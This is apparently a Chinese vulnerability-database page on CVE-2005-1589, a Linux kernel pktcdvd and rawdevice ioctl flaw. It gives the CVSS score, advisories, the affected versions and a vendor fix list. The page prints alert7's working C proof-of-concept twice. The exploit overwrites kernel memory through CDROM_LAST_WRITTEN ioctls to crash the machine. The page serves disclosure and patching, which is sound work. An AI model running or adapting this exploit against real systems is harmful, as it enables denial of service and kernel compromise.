CVE-2005-1589
CVSS7.2
发布时间 :2005-05-17 00:00:00
修订时间 :2016-11-18 21:59:23
NMCOEPS    

[原文]The pkt_ioctl function in the pktcdvd block device ioctl handler (pktcdvd.c) in Linux kernel 2.6.12-rc4 and earlier calls the wrong function before passing an ioctl to the block device, which crosses security boundaries by making kernel address space accessible from user space and allows local users to cause a denial of service and possibly execute arbitrary code, a similar vulnerability to CVE-2005-1264.


[CNNVD]Linux Kernel IOCTL处理器多个本地内存破坏漏洞(CNNVD-200505-1085)

        Linux Kernel是开放源码操作系统Linux所使用的内核。
        Linux kernel的pktcdvd和rawdevice块设备组件中存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1589
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1589
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1085
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0045.html
(VENDOR_ADVISORY)  VULNWATCH  20050516 Linux kernel pktcdvd and rawdevice ioctl break user space limit vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0046.html
(UNKNOWN)  VULNWATCH  20050517 Re: Linux kernel pktcdvd and rawdevice ioctl break user space limit vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0047.html
(UNKNOWN)  VULNWATCH  20050517 Linux kernel pktcdvd ioctl break user space limit vulnerability [corrected]
http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10
(UNKNOWN)  CONFIRM  http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10
http://marc.info/?l=linux-kernel&m=111630531515901&w=2
(UNKNOWN)  MLIST  [linux-kernel] 20050517 [PATCH] Fix root hole in pktcdvd
http://www.securityfocus.com/bid/13651
(UNKNOWN)  BID  13651
http://www.vupen.com/english/advisories/2005/0557
(UNKNOWN)  VUPEN  ADV-2005-0557

- 漏洞信息

Linux Kernel IOCTL处理器多个本地内存破坏漏洞
高危 设计错误
2005-05-17 00:00:00 2005-10-25 00:00:00
本地  
        Linux Kernel是开放源码操作系统Linux所使用的内核。
        Linux kernel的pktcdvd和rawdevice块设备组件中存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (998)

Linux Kernel <= 2.6.12-rc4 (ioctl_by_bdev) Local Denial of Service Exploit (EDBID:998)
linux dos
2005-05-17 Verified
0 alert7
N/A [点击下载]
/* pktcdvd_dos.c proof-of-concept 
* This is only a lame POC which will crash the machine, no root shell here. 
* --- alert7 
* 2005-5-15 
* the vulnerability in 2.6 up to and including 2.6.12-rc4 
* 
* gcc -o pktcdvd_dos pktcdvd_dos.c 
* 
* NOTE: require user can read pktcdvd block device 


* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" 
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 
*/ 


#define _GNU_SOURCE 
#include <stdio.h> 
#include <stdlib.h> 
#include <errno.h> 
#include <string.h> 
#include <unistd.h> 
#include <fcntl.h> 
#include <signal.h> 
#include <paths.h> 
#include <grp.h> 
#include <setjmp.h> 
#include <stdint.h> 
#include <sys/mman.h> 
#include <sys/ipc.h> 
#include <sys/shm.h> 
#include <sys/ucontext.h> 
#include <sys/wait.h> 
#include <asm/ldt.h> 
#include <asm/page.h> 
#include <asm/segment.h> 
#include <linux/unistd.h> 
#include <linux/linkage.h> 
#include <sys/types.h> 
#include <sys/stat.h> 
#include <fcntl.h> 
#include <linux/sysctl.h> 
#include <linux/cdrom.h> 


#define __NR_sys_ioctl __NR_ioctl 



#define PKTCDVDDEVICE "/dev/hdc" 


static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long, arg); 


struct idtr { 
unsigned short limit; 
unsigned int base; 
} __attribute__ ((packed)); 


unsigned int get_addr_idt() { 
struct idtr idtr; 
asm("sidt %0" : "=m" (idtr)); 
return idtr.base; 
} 
struct desc_struct { 
unsigned long a,b; 
}; 
int main(int argc,char **argv) 
{ 
unsigned int ptr_idt; 
int iret ; 
int fd; 


printf("[++]user stack addr %p \n",&ptr_idt); 
if ( ( (unsigned long )&ptr_idt >>24)==0xfe){ 
printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n"); 
return -1; 
} 


ptr_idt=get_addr_idt(); 
printf("[++]IDT Addr %p \n",ptr_idt); 



fd = open(PKTCDVDDEVICE,O_RDONLY); 
if (fd ==-1) 
{ 
printf("[--]"); 
fflush(stdout); 
perror("open"); 
return -1; 
} 

unsigned long WriteTo ; 


if ( (ptr_idt>>24)==0xc0){ 
printf("[++]this OS in Real Linux\n"); 
WriteTo= ptr_idt; 
}else{ 
printf("[++]this OS maybe in VMWARE\n"); 
WriteTo = 0xc0100000; 
} 


printf("[++]call sys_ioctl will crash machine\n"); 
fflush(stdout); 

int loopi; 
for (loopi=0;loopi<0x100000 ;loopi++ ) 
{ 
printf("[++]will write data at 0x%x\n",WriteTo+loopi*4); 
fflush(stdout); 
iret = sys_ioctl(fd, 
CDROM_LAST_WRITTEN, 
WriteTo+loopi*4); 
if (iret ==-1) 
{ 
printf("[--]"); 
fflush(stdout); 
perror("ioctl"); 
//if in VMWARE ,rewrite ptr_idt adress will failed 
printf("[--]still aliving\n"); 
close(fd); 
return -1; 
} 
} 
close(fd); 
return 0; 
} 

// milw0rm.com [2005-05-17]
		

- 漏洞信息 (F39272)

lk26.txt (PacketStormID:F39272)
2005-08-14 00:00:00
alert7  
exploit,denial of service,arbitrary,kernel,local,root,proof of concept
linux
CVE-2005-1589
[点击下载]

Two locally exploitable flaws have been found in the Linux rawdevice and pktcdvd block device ioctl handler that allows local users to gain root privileges and also execute arbitrary code at kernel privilege level. Proof of concept denial of service exploit included.

Synopsis:  Linux kernel pktcdvd and rawdevice ioctl break user space 
						limit vulnerability
Product:   Linux kernel
Version:   2.6 up to and including 2.6.12-rc4
Vendor:    http://www.kernel.org/
URL:       
CVE:       CAN-2005-1589
Severity:  local(7)
Date:      May 16, 2005


Issue:
======

Two locally exploitable flaws have been found in the Linux rawdevice and 
pktcdvd block device ioctl handler that allows local users to gain root 
privileges and also execute arbitrary code at kernel privilege level.


Details:
========

The Linux kernel contains pktcdvd and rawdevice block device components. 
Due to the missing check Pktcdvd and rawdevice ioctl handler parameter,
the process can break user space limit and  execute arbitrary code at 
kernel privilege level.


Discussion:
=============

The vulnerable  code  resides  in  drivers/block/pktcdvd.c  in  your  
preferable version of the Linux kernel source code tree:

static int pkt_ioctl(struct inode *inode, struct file *file, unsigned 
					int cmd, unsigned long arg)
{
	struct pktcdvd_device *pd = inode->i_bdev->bd_disk->private_data;

	VPRINTK("pkt_ioctl: cmd %x, dev %d:%d\n", cmd, imajor(inode), 
							iminor(inode));
	BUG_ON(!pd);

	switch (cmd) {
	/*
	 * forward selected CDROM ioctls to CD-ROM, for UDF
	 */
	case CDROMMULTISESSION:
	case CDROMREADTOCENTRY:
	case CDROM_LAST_WRITTEN:
	case CDROM_SEND_PACKET:
	case SCSI_IOCTL_SEND_COMMAND:
[*]		return ioctl_by_bdev(pd->bdev, cmd, arg);

	case CDROMEJECT:
		/*
		 * The door gets locked when the device is opened, so we
		 * have to unlock it or else the eject command fails.
		 */
		pkt_lock_door(pd, 0);
[*]		return ioctl_by_bdev(pd->bdev, cmd, arg);

	default:

As can be seen from [*] the arg variable supplied to  the  ioctl_by_bdev()
function  is not checked and user can input arg > TASK_SIZE value.


fs/block_dev.c
int ioctl_by_bdev(struct block_device *bdev, unsigned cmd, unsigned long arg)
{
	int res;
	mm_segment_t old_fs = get_fs();
[**]	set_fs(KERNEL_DS);
	res = blkdev_ioctl(bdev->bd_inode, NULL, cmd, arg);
	set_fs(old_fs);
	return res;
}

However, for also support kernel space parameters ,ioctl_by_bdev() call [**] 
set_fs(KERNEL_DS) to access parameters in kernel space . So if 
ioctl_by_bdev() parameter arg > TASK_SIZE,the process can break user space 
limit and rewrite kernel space data. Local user can execute arbitrary code 
at kernel privilege level.

This exploit require user can read the block device.


Rawdevice is similar above

drivers/char/raw.c
static int
raw_ioctl(struct inode *inode, struct file *filp,
		  unsigned int command, unsigned long arg)
{
	struct block_device *bdev = filp->private_data;

[*]	return ioctl_by_bdev(bdev, command, arg);
}



CREDIT:
========

alert7 ( wangwei@ssr.cn , alert7@xfocus.org )  discovery this vulnerability
Special thanks to ssr and xfocus guys:P



DISCLAIMER:
========
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. 

ZHONGHANGJIAXIN INFORMATION TECHNOLOGY CO.,LTD (http://www.ssr.cn)
Copyright 2003-2005 ZHONGHANGJIAXIN. All Rights Reserved. Terms of use.

Security
Trusted {Solution} Provider
Service


Appendix:
=========

/*  pktcdvd_dos.c proof-of-concept 
 *  This is only a lame POC which will crash the machine, no root shell here.
 *                      --- alert7
 *				2005-5-15
 *  the vulnerability in 2.6 up to and including 2.6.12-rc4
 *
 *  gcc -o pktcdvd_dos pktcdvd_dos.c
 *
 *  NOTE: require user can read pktcdvd block device 

 *	THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 *	AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 *	WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/sysctl.h>
#include <linux/cdrom.h>

#define __NR_sys_ioctl		__NR_ioctl


#define PKTCDVDDEVICE "/dev/hdc"

static inline _syscall3(int, sys_ioctl, int ,fd,int, cmd,unsigned long, arg);

struct idtr {
        unsigned short  limit;
        unsigned int    base;
} __attribute__ ((packed));

unsigned int get_addr_idt() {
        struct idtr idtr;
        asm("sidt %0" : "=m" (idtr));
        return idtr.base;
}
struct desc_struct {
	unsigned long a,b;
};
int main(int argc,char **argv)
{
        unsigned int ptr_idt;
        int iret ;
        int fd;

	printf("[++]user stack addr  %p \n",&ptr_idt);
	if ( ( (unsigned long )&ptr_idt >>24)==0xfe){
		 printf("[--]this kernel patched 4g/4g patch,no vulnerability!\n");
		 return -1;
	}

        ptr_idt=get_addr_idt();
        printf("[++]IDT Addr %p \n",ptr_idt);


        fd = open(PKTCDVDDEVICE,O_RDONLY);
        if (fd ==-1)
        {
			printf("[--]");
            fflush(stdout);
			perror("open");
            return -1;
        }
		
	unsigned long WriteTo ;

       if ( (ptr_idt>>24)==0xc0){
            printf("[++]this OS in Real Linux\n");
			WriteTo= ptr_idt;
	   }else{
            printf("[++]this OS maybe in VMWARE\n");
			WriteTo = 0xc0100000;
	}

	printf("[++]call sys_ioctl will crash machine\n");
        fflush(stdout);
		
	int loopi;
	for (loopi=0;loopi<0x100000 ;loopi++ )
	{
		printf("[++]will write data at 0x%x\n",WriteTo+loopi*4);
		fflush(stdout);		
		iret = sys_ioctl(fd,
				 CDROM_LAST_WRITTEN,
				 WriteTo+loopi*4);
		if (iret ==-1)
		{
			printf("[--]");
			fflush(stdout);
			perror("ioctl");
			//if in VMWARE ,rewrite ptr_idt adress will failed
			printf("[--]still aliving\n");
			close(fd);
			return -1;
		}
	}
        close(fd);

	return 0;
}


---------------THE END---------------





    

- 漏洞信息

16608
Linux Kernel pktcdvd Device ioctl_by_bdev() Function Kernel Memory Corruption
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-05-16 Unknow
2005-05-17 Unknow

- 解决方案

Upgrade to version 2.6.11.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Linux Kernel IOCTL Handlers Local Memory Corruption Vulnerabilities
Design Error 13651
No Yes
2005-05-17 12:00:00 2009-07-12 02:56:00
alert7 <wangwei@ssr.cn> is credited with the discovery of this issue.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core3
Red Hat Enterprise Linux AS 4
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
+ Red Hat Fedora Core4
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Conectiva Linux 10.0

- 漏洞讨论

The Linux kernel raw device and pktcdvd block device ioctl handlers are reported prone to local kernel-based memory corruption vulnerabilities. The issues manifest due to a lack of sanity checks performed on argument values that are passed to the 'raw_ioctl()' and 'pkt_ioctl()' functions.

A local attacker, that has read access to a sufficient block device, may leverage this memory corruption to execute arbitrary attacker-supplied code in the context of the system kernel (ring-0).

- 漏洞利用

The following denial of service proof of concept is available:

- 解决方案

Red Hat has released advisory RHSA-2005:420-22 and fixes to address this issue and another issue on Red Hat Linux Enterprise platforms. Customers that are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Ubuntu Linux has released advisory USN-131-1 to address this, and other issues. Please see the referenced advisory for further information.

RedHat Fedora Linux has released advisory FEDORA-2005-392 addressing this issue for Fedora Core 3. Please see the referenced advisory for details on obtaining and applying the appropriate updates.

Mandriva Linux has released advisory MDKSA-2005:110 addressing this issue. Please see the referenced advisory for further information.

Red Hat has released an updated advisory RHSA-2005:420-24 to address various issues affecting the kernel. Please see the advisory in Web references for more information.

Conectiva Linux has released security advisory CLSA-2005:999 addressing this and other issues. Please see the referenced advisory for details on obtaining and applying the appropriate updates.

Mandriva has released advisory MDKSA-2005:219 to address various issues affecting the Linux Kernel in Mandrake Linux 10.1. Please see the referenced advisory for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Linux kernel 2.6.10

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站